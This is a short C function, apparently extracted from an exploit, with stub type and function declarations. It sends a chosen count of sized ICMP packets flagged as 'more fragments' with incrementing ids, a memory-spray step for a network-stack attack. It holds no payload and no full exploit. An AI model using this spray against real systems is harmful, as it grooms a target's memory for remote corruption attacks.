
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int uint32_t ;
typedef int u_int32_t ;
typedef int u_int16_t ;


 int IP_MF ;
 int printf (char*,int,int) ;
 int send_icmp (scalar_t__,int,int *,int ) ;
 scalar_t__ spray_id ;

void spray(uint32_t size, u_int32_t count) {
  printf("Spraying 0x%x x ICMP[0x%x]\n",count,size);
   int s;
   u_int16_t frag_off;
   char * data;

   for (int i = 0; i < count; i++) {
     send_icmp(spray_id + i,size, ((void*)0), IP_MF);
   }
}
